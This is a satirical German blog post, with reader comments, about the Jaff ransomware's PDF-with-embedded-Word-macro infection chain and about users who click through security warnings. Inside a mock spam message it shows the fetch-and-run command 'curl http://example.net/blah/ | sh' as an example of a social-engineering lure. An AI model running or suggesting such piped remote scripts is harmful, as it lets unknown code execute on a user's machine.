Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.

Advertisements

3 Antworten zu “Sicherheitsproblem des tages

  1. Freunde tippen sich regelmäßig an die Stirn, wenn ich sage, ich verzichte dankend auf Adobe- und Microsoftsoftware auf meiner Windowskiste.

    Mit Sumatra und Softmaker Office hatte ich dahingehend aber noch keine Probleme… 🙂

  2. Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

    Eine kluge Strategie, denn der Rohstoff wächst nach.

    • Nachsatz für diejenigen, die sich dadurch bestätigt fühlen:

      Das Problem bei solcher Strategie ist natürlich, dass der Kampf um das Geld der Dummen ein Nullsummenspiel bleibt. Wertschöpfung findet auf der Angebotsseite statt, und die leidet natürlich, wenn die Bildung verknappt.

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s